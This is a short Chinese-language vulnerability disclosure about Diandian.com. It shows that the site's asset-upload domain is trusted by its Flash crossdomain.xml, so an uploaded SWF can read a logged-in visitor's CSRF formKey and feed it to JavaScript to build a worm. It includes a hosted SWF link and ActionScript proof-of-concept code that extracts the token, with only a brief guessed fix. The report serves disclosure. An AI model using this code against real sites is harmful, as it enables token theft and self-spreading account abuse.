模版静态资源上传页面（http://www.diandian.com/upload/asset）和Flash跨域通信的配置文件中（http://www.diandain.com/crossdomain.xml）允许的域名相同，只需上传一个SWF，就可以读到formKey了。把这SWF嵌入到blog页面中，读到访客的formKey，调用externalInterface把值给输到JS里，又能worm了吧。
http://x.libdd.com/farm1/f15341/7cef03a1/diandian.swf
 
var result_txt = new TextField();
result_txt.x = 0;
result_txt.y = 0;
result_txt.height = 22;
result_txt.width = 200;
addChild(result_txt);
var targetURL:String="http://www.diandian.com/home";
var request:URLRequest=new URLRequest(targetURL);
request.method=URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event){
  var formKey:String = loader.data;
  formKey = formKey.split("window.DDformKey = '")[1].split("'")[0]
  result_txt.text = formKey
}
loader.load(request)
效果就这样：
 
 
 
修复方案：
 
改配置文件？改存储静态文件的域名？
作者  p.z